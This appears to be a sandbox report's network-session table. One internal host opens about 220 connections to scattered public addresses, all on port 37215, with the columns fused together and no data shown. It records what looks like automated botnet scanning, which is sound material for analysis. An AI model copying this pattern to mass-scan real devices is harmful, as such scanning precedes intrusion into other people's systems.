                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27781192.168.2.153934037.54.248.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27782192.168.2.153316845.214.92.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27783192.168.2.1534408190.66.45.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27784192.168.2.1552600197.77.29.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27785192.168.2.1534156181.23.43.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27786192.168.2.1548170156.149.81.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27787192.168.2.1544988102.13.207.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27788192.168.2.1551374186.78.150.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27789192.168.2.1555132121.210.149.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27790192.168.2.153999031.71.236.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27791192.168.2.1533606157.166.75.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27792192.168.2.15507568.48.108.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27793192.168.2.155417431.52.2.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27794192.168.2.1540878190.211.239.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27795192.168.2.1559904197.241.112.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27796192.168.2.155238431.163.249.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27797192.168.2.1543248156.159.49.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27798192.168.2.1543270186.23.142.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27799192.168.2.1537374222.103.89.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27800192.168.2.1551606122.38.37.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27801192.168.2.1558324121.70.252.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27802192.168.2.1546268121.23.130.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27803192.168.2.1539980121.178.18.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27804192.168.2.1536478197.8.200.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27805192.168.2.1550842122.118.131.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27806192.168.2.1548498190.24.19.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27807192.168.2.1544356186.235.176.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27808192.168.2.154028645.12.149.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27809192.168.2.1552352138.175.188.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27810192.168.2.1535658186.115.235.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27811192.168.2.1534902138.89.119.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27812192.168.2.1534200197.34.151.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27813192.168.2.153712437.190.252.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27814192.168.2.1538834186.44.118.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27815192.168.2.1552744181.209.195.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27816192.168.2.1549448138.113.89.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27817192.168.2.1543600186.213.207.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27818192.168.2.154803294.169.208.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27819192.168.2.153773437.108.154.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27820192.168.2.1558988122.26.120.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27821192.168.2.1552404121.184.142.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27822192.168.2.1543326222.210.248.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27823192.168.2.1553032156.37.177.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27824192.168.2.1552328157.32.117.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27825192.168.2.1539492186.249.104.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27826192.168.2.153378894.79.178.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27827192.168.2.1538530102.248.197.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27828192.168.2.1538418222.230.21.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27829192.168.2.153554494.182.64.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27830192.168.2.156036445.154.14.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27831192.168.2.1543712122.209.83.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27832192.168.2.153608694.160.137.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27833192.168.2.1558734197.169.79.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27834192.168.2.1551260186.138.18.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27835192.168.2.1551282156.205.168.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27836192.168.2.1536674138.241.51.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27837192.168.2.1545660190.97.131.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27838192.168.2.1534358197.113.65.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27839192.168.2.1552200122.8.182.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27840192.168.2.1558220156.67.18.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27841192.168.2.1549050121.142.173.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27842192.168.2.153580437.133.151.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27843192.168.2.1560218102.41.250.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27844192.168.2.154658694.67.179.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27845192.168.2.1546058157.86.94.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27846192.168.2.155017075.68.107.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27847192.168.2.1539464157.59.18.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27848192.168.2.1552620156.166.3.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27849192.168.2.1558606190.176.171.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27850192.168.2.1540336186.171.223.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27851192.168.2.1538076102.129.241.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27852192.168.2.154131031.95.240.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27853192.168.2.1553960157.184.162.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27854192.168.2.1545418222.255.6.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27855192.168.2.1534590121.149.126.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27856192.168.2.155432653.178.21.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27857192.168.2.155214631.230.204.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27858192.168.2.1557944222.202.35.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27859192.168.2.1555034190.116.10.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27860192.168.2.1552206102.41.13.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27861192.168.2.155332437.12.44.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27862192.168.2.1535072102.182.58.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27863192.168.2.154328041.35.229.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27864192.168.2.154742637.46.246.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27865192.168.2.1538102222.210.119.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27866192.168.2.1536288197.218.130.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27867192.168.2.1539084181.36.68.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27868192.168.2.1538332156.106.80.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27869192.168.2.153909836.184.234.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27870192.168.2.1536636121.203.136.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27871192.168.2.1545490157.219.121.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27872192.168.2.1547356222.69.47.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27873192.168.2.1553318156.26.134.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27874192.168.2.1544318186.38.60.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27875192.168.2.1555884156.17.65.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27876192.168.2.1553568181.210.204.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27877192.168.2.1540646122.58.229.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27878192.168.2.1548758222.151.195.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27879192.168.2.155288041.56.49.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27880192.168.2.1538446122.16.177.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27881192.168.2.1551526121.37.187.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27882192.168.2.1559378156.153.137.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27883192.168.2.154364441.7.101.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27884192.168.2.155771431.14.62.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27885192.168.2.1555150122.246.142.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27886192.168.2.153410637.176.90.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27887192.168.2.1555010186.209.69.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27888192.168.2.1550354186.160.72.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27889192.168.2.1535232190.126.171.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27890192.168.2.1556648123.161.137.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27891192.168.2.154202245.127.218.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27892192.168.2.1547574190.153.9.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27893192.168.2.1545374186.245.123.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27894192.168.2.1547804156.205.247.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27895192.168.2.153280445.33.69.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27896192.168.2.155593231.154.102.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27897192.168.2.1539202181.32.11.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27898192.168.2.154650641.121.81.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27899192.168.2.1538604181.234.149.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27900192.168.2.153285037.44.19.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27901192.168.2.155363831.180.117.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27902192.168.2.1558896197.63.160.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27903192.168.2.1540260121.88.8.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27904192.168.2.1537880222.52.160.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27905192.168.2.1549510122.22.167.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27906192.168.2.1540944197.44.143.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27907192.168.2.1557788102.25.99.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27908192.168.2.1556806179.48.72.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27909192.168.2.1552258164.112.120.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27910192.168.2.155242431.106.183.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27911192.168.2.155445045.250.158.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27912192.168.2.155648045.240.166.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27913192.168.2.155979045.136.50.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27914192.168.2.1543908102.80.79.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27915192.168.2.156048241.182.216.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27916192.168.2.153646041.14.177.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27917192.168.2.154211041.63.167.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27918192.168.2.1553004121.180.108.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27919192.168.2.154199094.68.128.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27920192.168.2.1537186121.14.44.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27921192.168.2.1541414181.246.42.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27922192.168.2.1560482181.183.97.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27923192.168.2.154253694.94.64.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27924192.168.2.1560050102.83.189.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27925192.168.2.1540214197.192.88.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27926192.168.2.1549348122.235.225.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27927192.168.2.1552078138.48.40.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27928192.168.2.1560506197.153.143.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27929192.168.2.1541828197.185.250.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27930192.168.2.1560248121.192.253.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27931192.168.2.1535146152.150.187.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27932192.168.2.1533388131.112.143.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27933192.168.2.1558682197.94.189.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27934192.168.2.154196051.45.168.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27935192.168.2.1536594186.213.147.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27936192.168.2.153637045.95.180.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27937192.168.2.155745694.246.220.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27938192.168.2.154686041.100.79.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27939192.168.2.1557698190.36.162.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27940192.168.2.1552470186.170.33.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27941192.168.2.1538752157.76.121.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27942192.168.2.1540590157.11.174.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27943192.168.2.1544626181.133.96.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27944192.168.2.156099240.45.205.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27945192.168.2.155275445.120.27.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27946192.168.2.1554936156.167.158.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27947192.168.2.154696494.47.250.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27948192.168.2.155755045.16.48.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27949192.168.2.1535224190.202.178.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27950192.168.2.1558320138.130.196.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27951192.168.2.155661645.171.18.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27952192.168.2.154917894.186.109.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27953192.168.2.155207845.66.168.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27954192.168.2.1548164186.242.139.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27955192.168.2.1544082102.142.244.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27956192.168.2.1543066197.77.52.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27957192.168.2.1559566102.165.162.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27958192.168.2.1544268190.21.56.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27959192.168.2.1539648156.89.164.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27960192.168.2.154155231.113.136.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27961192.168.2.1539730102.214.165.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27962192.168.2.156094894.240.71.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27963192.168.2.154825637.72.180.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27964192.168.2.155636837.61.82.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27965192.168.2.1552454121.90.41.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27966192.168.2.153426841.51.117.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27967192.168.2.1559652138.62.126.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27968192.168.2.1556684186.58.187.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27969192.168.2.1540692190.140.71.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27970192.168.2.1553474181.166.211.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27971192.168.2.153873837.184.174.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27972192.168.2.155596494.203.53.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27973192.168.2.154033037.3.123.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27974192.168.2.1541672138.182.243.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27975192.168.2.155834445.200.60.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27976192.168.2.1540998186.181.148.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27977192.168.2.154577837.176.152.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27978192.168.2.1556282122.124.234.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27979192.168.2.1544010157.62.105.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27980192.168.2.155085245.120.17.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27981192.168.2.1552884156.91.108.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27982192.168.2.1547370222.92.191.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27983192.168.2.1555648197.87.61.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27984192.168.2.1534862222.242.66.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27985192.168.2.154019837.163.73.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27986192.168.2.155320245.206.175.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27987192.168.2.1555376190.125.141.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27988192.168.2.1542568181.249.161.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27989192.168.2.153426637.220.70.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27990192.168.2.1535876197.39.177.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27991192.168.2.1557614186.198.243.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27992192.168.2.1551770157.93.61.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27993192.168.2.1533106138.164.109.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27994192.168.2.1543794122.227.232.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27995192.168.2.153917237.90.98.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27996192.168.2.153539045.160.89.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27997192.168.2.1550452121.84.25.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27998192.168.2.1542018181.183.141.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
